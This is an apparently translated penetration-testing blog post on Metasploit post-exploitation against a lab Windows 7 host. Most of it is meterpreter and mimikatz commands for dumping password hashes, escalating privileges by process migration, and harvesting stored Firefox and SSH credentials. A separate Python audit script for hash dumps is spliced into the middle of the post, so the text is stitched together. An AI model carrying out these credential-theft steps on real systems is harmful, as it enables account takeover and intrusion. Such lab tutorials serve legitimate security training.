Intranet Penetration: Intranet Information Collection (3)
2022-07-06 14:29:00 【Unknown white hat】
Contents
Metasploit intranet information collection
Privilege escalation for ordinary users
Metasploit Intranet information collection
Attacker: Kali 192.168.0.103
Target: Windows 7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump // requires a meterpreter session with SYSTEM privileges
set session 1
exploit // the results are stored under the tmp directory
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
username:RID:LM-hash:NT-hash
The RID is a fixed value assigned to each Windows system account, similar to the uid and gid numbers on Linux: 500 is Administrator, 501 is Guest, and so on. The LM hash and the NT hash are both derived from the user's password, but each uses a different algorithm.
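The format above, seen from the defender's side, as an added example (not code from the original post): a Python parser for `username:RID:LM-hash:NT-hash` lines that reports what the hash fields reveal on their own during an authorized audit. The sample lines and the names `parse` and `audit` are constructed for illustration, and the trailing `:::` is assumed to be optional.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
BUILTIN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):{0,3}$")

# Constructed sample: hash values are made up, except the two well-known empty-value hashes.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:11112222333344445555666677778888:0123456789abcdef0123456789abcdef:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] this line is not an account record
"""

def parse(text):
    """Return (accounts, skipped): parsed account dicts and non-empty unparsable lines."""
    accounts, skipped = [], []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            skipped += [line] if line.strip() else []
            continue
        user, rid, lm, nt = m.groups()
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts, skipped

def audit(accounts):
    """Return {user: [findings]} for weaknesses visible from the hash fields alone."""
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    findings = defaultdict(list)
    for a in accounts:
        if a["rid"] in BUILTIN_RIDS:
            findings[a["user"]].append(BUILTIN_RIDS[a["rid"]])
        if a["lm"] != EMPTY_LM:
            findings[a["user"]].append("LM hash stored (disable LM hash storage, reset password)")
        if a["nt"] == EMPTY_NT:
            findings[a["user"]].append("blank password")
        elif len(by_nt[a["nt"]]) > 1:  # NT hashes are unsalted: equal hash means equal password
            others = [u for u in by_nt[a["nt"]] if u != a["user"]]
            findings[a["user"]].append("same password as " + ", ".join(others))
    return dict(findings)

if __name__ == "__main__":
    print(audit(parse(SAMPLE)[0]))
```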
hashdump uses part of mimikatz's functionality
load mimikatz
wdigest, kerberos, msv, ssp, tspkg, livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Privilege escalation for ordinary users
getuid
View the current user's privileges
hashdump
Requires administrator privileges
getsystem
This only appears to grant administrator privileges; the session still lacks some real administrator privileges
ps
List the processes
getpid
View the current process
migrate
Process migration (migrate from an ordinary user's process to an administrator user's process)
hashdump
08 Other
Determine whether the target host is a virtual machine:
run checkvm
Get the software installation information on the target host:
run post/windows/gather/enum_applications
Get the most recently accessed documents and link information on the target host:
run post/windows/gather/dumplinks
View the target environment information:
run post/windows/gather/env
View the accounts and passwords stored in Firefox:
run post/windows/gather/firefox_creds
View the ciphertext of SSH account passwords and the certificate information:
run post/windows/gather/ssh_creds